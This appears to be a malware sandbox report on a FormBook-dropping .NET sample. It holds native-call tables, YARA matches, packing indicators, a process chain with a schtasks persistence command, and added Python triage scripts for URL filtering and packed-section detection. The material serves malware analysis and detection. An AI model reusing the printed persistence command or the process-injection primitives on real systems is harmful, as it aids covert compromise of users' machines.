| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_00419C90 | NtCreateFile |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_00419D40 | NtReadFile |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_00419DC0 | NtClose |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_00419E70 | NtAllocateVirtualMemory |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_00419D3A | NtReadFile |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A99A0 | NtCreateSection, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9910 | NtAdjustPrivilegesToken, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A98F0 | NtReadVirtualMemory, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9840 | NtDelayExecution, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9860 | NtQuerySystemInformation, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9A00 | NtProtectVirtualMemory, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9A20 | NtResumeThread, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9A50 | NtCreateFile, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A95D0 | NtClose, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9540 | NtReadFile, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9780 | NtMapViewOfSection, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A97A0 | NtUnmapViewOfSection, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9710 | NtQueryInformationToken, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A96E0 | NtFreeVirtualMemory, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9660 | NtAllocateVirtualMemory, LdrInitializeThunk |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A99D0 | NtCreateProcessEx |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9950 | NtQueueApcThread |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A98A0 | NtWriteVirtualMemory |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9820 | NtEnumerateKey |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019AB040 | NtSuspendThread |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019AA3B0 | NtGetContextThread |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9B00 | NtSetValueKey |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9A80 | NtOpenDirectoryObject |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9A10 | NtQuerySection |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A95F0 | NtQueryInformationFile |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019AAD30 | NtSetContextThread |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9520 | NtWaitForSingleObject |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9560 | NtWriteFile |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9FE0 | NtCreateMutant |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019AA710 | NtOpenProcessToken |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9730 | NtQueryVirtualMemory |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019AA770 | NtOpenThread |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9770 | NtSetInformationFile |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9760 | NtOpenProcess |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A96D0 | NtCreateKey |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9610 | NtEnumerateValueKey |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9650 | NtQueryValueKey |
| C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe | 3_2_019A9670 | NtQueryInformationProcess |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39A50 | NtCreateFile, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39860 | NtQuerySystemInformation, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39840 | NtDelayExecution, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E399A0 | NtCreateSection, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39910 | NtAdjustPrivilegesToken, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E396E0 | NtFreeVirtualMemory, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E396D0 | NtCreateKey, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39FE0 | NtCreateMutant, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39780 | NtMapViewOfSection, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39770 | NtSetInformationFile, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39710 | NtQueryInformationToken, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E395D0 | NtClose, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39560 | NtWriteFile, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39540 | NtReadFile, LdrInitializeThunk |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39A80 | NtOpenDirectoryObject |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39A20 | NtResumeThread |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39A00 | NtProtectVirtualMemory |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39A10 | NtQuerySection |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E3A3B0 | NtGetContextThread |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39B00 | NtSetValueKey |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E398F0 | NtReadVirtualMemory |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E398A0 | NtWriteVirtualMemory |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E3B040 | NtSuspendThread |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39820 | NtEnumerateKey |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E399D0 | NtCreateProcessEx |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39950 | NtQueueApcThread |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39660 | NtAllocateVirtualMemory |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39670 | NtQueryInformationProcess |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39650 | NtQueryValueKey |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39610 | NtEnumerateValueKey |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E397A0 | NtUnmapViewOfSection |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39760 | NtOpenProcess |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E3A770 | NtOpenThread |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39730 | NtQueryVirtualMemory |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E3A710 | NtOpenProcessToken |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E395F0 | NtQueryInformationFile |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E39520 | NtWaitForSingleObject |
| C:\Windows\SysWOW64\cmd.exe | 13_2_02E3AD30 | NtSetContextThread |
| C:\Windows\SysWOW64\cmd.exe | 13_2_00519C90 | NtCreateFile |
| C:\Windows\SysWOW64\cmd.exe | 13_2_00519D40 | NtReadFile |
| C:\Windows\SysWOW64\cmd.exe | 13_2_00519DC0 | NtClose |
| C:\Windows\SysWOW64\cmd.exe | 13_2_00519D3A | NtReadFile |
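Two of the listings in this section answer triage questions only once they are cross-referenced: the "String found in binary or memory" records decide which URLs belong to the malware rather than to the font-vendor metadata that a clean explorer.exe also carries (fontbureau.com, sakkal.com and the like come from font files), and the native-call records decide which injection technique the sample and the hijacked cmd.exe actually have the primitives for. The script below is an added example, not part of this report or of the sandbox vendor's tooling. It parses constructed, shortened copies of record lines from this page; the `INJECTION_PRIMITIVES` mapping of technique names to minimal native-call sets is an assumption of the example, and `explorer.exe` is used as the clean baseline process because it appears in the report alongside the sample for the benign strings only.

```python
"""Triage of sandbox-report record lines. Added example, not part of the report."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The two record shapes used on this page.
STRING_RE = re.compile(r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)$")
CODE_RE = re.compile(r"^Source: (?P<image>\S+) Code function: (?P<pid>\d+)_\d+_[0-9A-Fa-f]+ (?P<apis>[A-Za-z0-9_,]+)")

# Minimal native-call sets that make each technique possible. This mapping is an
# assumption of the example; the report itself only names the techniques.
INJECTION_PRIMITIVES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "section mapping into remote process": {"NtCreateSection", "NtMapViewOfSection"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "thread context hijacking": {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
}

# Constructed sample input: shortened copies of record lines from this page.
SAMPLE_LINES = [
    "Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378919015.0000000005EA2000.00000004.00000001.sdmp, "
    "explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp "
    "String found in binary or memory: http://www.fontbureau.com/designers",
    "Source: explorer.exe, 00000004.00000000.397568079.000000000C230000.00000002.00000001.sdmp "
    "String found in binary or memory: http://www.tiro.com",
    "Source: uVSV3amss8eu5Sr.exe, 00000000.00000003.359230035.0000000004BCB000.00000004.00000001.sdmp "
    "String found in binary or memory: http://www.fontbureau.com/designersP",
    "Source: cmd.exe, 0000000D.00000002.620683412.00000000029C8000.00000004.00000001.sdmp "
    "String found in binary or memory: https://login.live.com/oauth20_desktop.srf",
    "Source: cmd.exe, 0000000D.00000002.620653930.00000000029B1000.00000004.00000001.sdmp "
    "String found in binary or memory: "
    "https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A60BEE NtQuerySystemInformation, 0_2_04A60BEE",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A99A0 NtCreateSection,LdrInitializeThunk, 3_2_019A99A0",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_019A9780",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_019A97A0",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A98A0 NtWriteVirtualMemory, 3_2_019A98A0",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AB040 NtSuspendThread, 3_2_019AB040",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AA3B0 NtGetContextThread, 3_2_019AA3B0",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019AAD30 NtSetContextThread, 3_2_019AAD30",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9A20 NtResumeThread,LdrInitializeThunk, 3_2_019A9A20",
    r"Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_019A9950 NtQueueApcThread, 3_2_019A9950",
    r"Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E397A0 NtUnmapViewOfSection, 13_2_02E397A0",
    r"Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E398A0 NtWriteVirtualMemory, 13_2_02E398A0",
    r"Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E3AD30 NtSetContextThread, 13_2_02E3AD30",
    r"Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39A20 NtResumeThread, 13_2_02E39A20",
    r"Source: C:\Windows\SysWOW64\cmd.exe Code function: 13_2_02E39950 NtQueueApcThread, 13_2_02E39950",
]


def parse_report(lines):
    """Return (url -> set of process names, 'image#index' -> set of Nt* calls)."""
    url_sources, native_calls = defaultdict(set), defaultdict(set)
    for line in lines:
        if m := STRING_RE.match(line):
            # Process names are the comma-separated tokens ending in .exe; the rest are dump ids.
            url_sources[m["url"]] |= {t.strip() for t in m["sources"].split(",") if t.strip().endswith(".exe")}
        elif m := CODE_RE.match(line):
            image = m["image"].rsplit("\\", 1)[-1]
            native_calls[f"{image}#{int(m['pid'])}"] |= {a for a in m["apis"].split(",") if a.startswith("Nt")}
    return dict(url_sources), dict(native_calls)


def suspicious_urls(url_sources, baseline="explorer.exe"):
    """URLs on hosts that the baseline process never references.

    Strings shared with a clean explorer.exe are font-file vendor metadata, so
    anything on those hosts is dropped even when only the sample's own memory
    holds that exact (often truncated) variant of the string.
    """
    baseline_hosts = {urlsplit(u).hostname for u, procs in url_sources.items() if baseline in procs}
    flagged = defaultdict(set)
    for url, procs in url_sources.items():
        if baseline not in procs and urlsplit(url).hostname not in baseline_hosts:
            for proc in procs:
                flagged[proc].add(url)
    return {proc: sorted(urls) for proc, urls in flagged.items()}


def infer_injection(native_calls):
    """Per process, every technique whose primitive set is fully present."""
    return {proc: sorted(name for name, need in INJECTION_PRIMITIVES.items() if need <= apis)
            for proc, apis in native_calls.items()}


if __name__ == "__main__":
    urls, calls = parse_report(SAMPLE_LINES)
    for proc, found in suspicious_urls(urls).items():
        print(f"{proc}: strings not explained by font metadata -> {found}")
    for proc, techniques in infer_injection(calls).items():
        print(f"{proc}: {', '.join(techniques) or 'no injection primitives'}")
```

On the constructed input only cmd.exe keeps a flagged string (the login.live.com OAuth URLs, which a legitimate cmd.exe has no reason to hold), while the sample-only `fontbureau.com/designersP` variant is discarded because its host is known from the baseline. The technique inference is deliberately loose: it reports what the call set permits, not what was observed at run time, so it is a filter for where to look in the trace rather than proof of the technique.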
Detected potential crypto function

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe, code functions 0_2_: 00162234, 0016865D, 049948DA, 0499C468, 04991670, 04991B81, 049957A0, 04993FF8, 049937F0, 0499DF10, 04991361, 04992C00, 04994428, 0499D990, 04996530, 04997530, 0499AD58, 04997540, 04996540, 04997970, 04997960, 0499BAB0, 049956A1, 0499B2C0, 04997AE1, 04997208, 04996F88, 04997710, 04997720, 0499374F, 04996F78, 07360070
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe, code functions 3_2_: 00401030, 0041E890, 0041E1FD, 0041D38A, 0041E52A, 00402D8A, 00402D90, 00409E2C, 00409E30, 0041DF99, 00402FB0, 00F52234, 00F5865D, 019899BF, 0196F900, 01984120, 0197B090, 01A320A8, 019920A0, 01A328EC, 01A3E824, 01A21002, 0198A830, 0198EB9A, 0199138B, 0199EBB0, 0199ABD8, 01A123E3, 01A2DBD2, 01A203DA, 01A32B28, 0198A309, 0198AB40, 01A0CB4F, 01A322AE, 01A24AEF, 01A1FA2B, 0198B236, 01992581, 01A22D82, 0197D5E0, 01A325DD, 01A32D07, 01960D20, 01A31D55, 01A24496, 0197841F, 01A2D466, 0198B477, 01A31FF1, 01A3DFCE, 01A11EB6, 01A32EF7, 01985600, 01986E30, 01A2D616
- Source: C:\Windows\SysWOW64\cmd.exe, code functions 13_2_: 02EB4AEF, 02EC22AE, 02EAFA2B, 02E1B236, 02EA23E3, 02EB03DA, 02EBDBD2, 02E2ABD8, 02E2EBB0, 02E2138B, 02E1AB40, 02E9CB4F, 02EC2B28, 02E1A309, 02EC28EC, 02E220A0, 02EC20A8, 02E0B090, 02ECE824, 02E1A830, 02EB1002, 02E199BF, 02E14120, 02DFF900, 02EC2EF7, 02E16E30, 02EBD616, 02EC1FF1, 02ECDFCE, 02EB4496, 02EBD466, 02E1B477, 02E0841F, 02E0D5E0, 02EC25DD, 02E22581, 02EB2D82, 02EC1D55, 02EC2D07, 02DF0D20, 0051E890, 0051E1FD, 0051E52A, 00502D90, 00502D8A, 00509E30, 00509E2C, 0051DF99, 00502FB0
Found potential string decryption / allocating functions

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: String function: 0196B150 appears 145 times
- Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 02DFB150 appears 136 times

Sample file is different than original file name gathered from version info

- Source: uVSV3amss8eu5Sr.exe Binary or memory string: OriginalFilename vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000000.355750027.0000000000162000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380250068.0000000007090000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379653630.0000000006470000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameB2B.exe4 vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378004309.0000000004A80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWinRar.dll. vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379292234.0000000006290000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380640171.0000000007190000.00000002.00000001.sdmp Binary or memory string: originalfilename vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380640171.0000000007190000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.375722005.000000000084A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe Binary or memory string: OriginalFilename vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.427481922.0000000000F52000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430593281.0000000001BEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430770312.0000000001DAD000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs uVSV3amss8eu5Sr.exe
- Source: uVSV3amss8eu5Sr.exe Binary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
Yara signature match

Two rules matched; their metadata is given once here:

- Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
- Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Both rules matched each of the following sources:

- 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY
- 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY
- 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY
- 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
- 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY
- 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY
- 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE
- 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

- Source: uVSV3amss8eu5Sr.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
- Source: JOOUCiAlE.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
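The packed-code heuristic above can be reproduced offline. The following is an added example of mine, not Joe Sandbox's implementation (the report does not state how its ratio is defined): it walks the PE section table with `struct`, compresses each section's raw bytes with zlib, and flags an executable section when zlib removes less than 30 % of it. Reading the report's "ratio < 0.3" as that saving is an assumption, and the in-memory PE builder plus the two section contents are constructed fixtures, not bytes from this sample.

```python
import hashlib
import struct
import zlib

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
EXEC_CODE = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ


def pe_sections(data: bytes):
    """Yield (name, characteristics, raw bytes) from the section table of a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    file_hdr = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, file_hdr + 2)[0]
    opt_size = struct.unpack_from("<H", data, file_hdr + 16)[0]
    table = file_hdr + 20 + opt_size            # section table follows the optional header
    for i in range(num_sections):
        off = table + 40 * i                    # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        yield name, chars, data[raw_ptr:raw_ptr + raw_size]


def section_report(data: bytes, threshold: float = 0.3):
    """Per section: the fraction of bytes zlib removes, and whether an executable
    section falls under the threshold (assumed reading of 'ratio < 0.3')."""
    rows = []
    for name, chars, raw in pe_sections(data):
        executable = bool(chars & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE))
        savings = 1.0 - len(zlib.compress(raw, 9)) / len(raw) if raw else 0.0
        rows.append({"name": name, "executable": executable,
                     "savings": round(savings, 3),
                     "likely_packed": executable and savings < threshold})
    return rows


def build_pe(sections):
    """Assemble a minimal PE32 image in memory from (name, characteristics, raw) tuples.
    Constructed test fixture only: most header fields are zero and it would not load."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    opt_size = 0xE0                                          # PE32 optional header size
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    hdr_len = len(dos) + 4 + len(file_hdr) + opt_size + 40 * len(sections)
    first_raw = (hdr_len + 0x1FF) & ~0x1FF                   # file alignment 0x200
    raw_ptr, table, body = first_raw, b"", b""
    for name, chars, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(raw), 0x1000, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
    header = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table
    return header + b"\0" * (first_raw - hdr_len) + body


# Constructed section contents: a repeated x86 prologue standing in for ordinary
# compiled code, and a SHA-256 chain standing in for packed or encrypted code.
PLAIN_CODE = bytes.fromhex("558bec83ec108b45088945fc") * 700
PACKED_CODE = b"".join(hashlib.sha256(b"constructed" + bytes([i])).digest() for i in range(256))


def demo():
    """Executable .text holding high-entropy data is flagged; a data section is not."""
    pe = build_pe([(".text", EXEC_CODE, PACKED_CODE),
                   (".rdata", IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA, PLAIN_CODE)])
    return section_report(pe)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Run it on a real file with `section_report(open(path, "rb").read())`; the threshold is deliberately a parameter, since legitimately compressed resources or .NET IL with embedded encrypted blobs will also score low.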
Classification label

- Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/6@6/3

Contains functionality to adjust token privileges (e.g. debug / backup)

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A6063A AdjustTokenPrivileges, 0_2_04A6063A
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 0_2_04A60603 AdjustTokenPrivileges, 0_2_04A60603

Creates files inside the user directory

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File created: C:\Users\user\AppData\Roaming\JOOUCiAlE.exe

Creates mutexes

- Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01

The mutant belongs to conhost.exe (its WIL error-reporting object, created whenever a console host starts); it is not a sample-specific indicator.

Creates temporary files

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File created: C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp

PE file has an executable .text section and no other executable section

- Source: uVSV3amss8eu5Sr.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application use the .NET runtime (probably coded in C#)

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File read: C:\Users\user\Desktop\desktop.ini

Reads software policies

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Reads the hosts file

- Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts

Sample is known by Antivirus

- Source: uVSV3amss8eu5Sr.exe Virustotal: Detection: 23%

Sample reads its own file content

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File read: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe
Spawns processes

The chain is: the .NET loader registers a scheduled task named Updates\JOOUCiAlE from an XML definition it wrote to %TEMP% (the task name matches the file dropped to AppData\Roaming), then starts a second copy of itself, whose unpacked image at 0x400000 (process 3) matched the FormBook rules above; cmd.exe (process 0xD, also matched) is the process the payload later injected into.

- Source: unknown Process created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe'
- Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'
- Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Source: unknown Process created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe {path}
- Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'
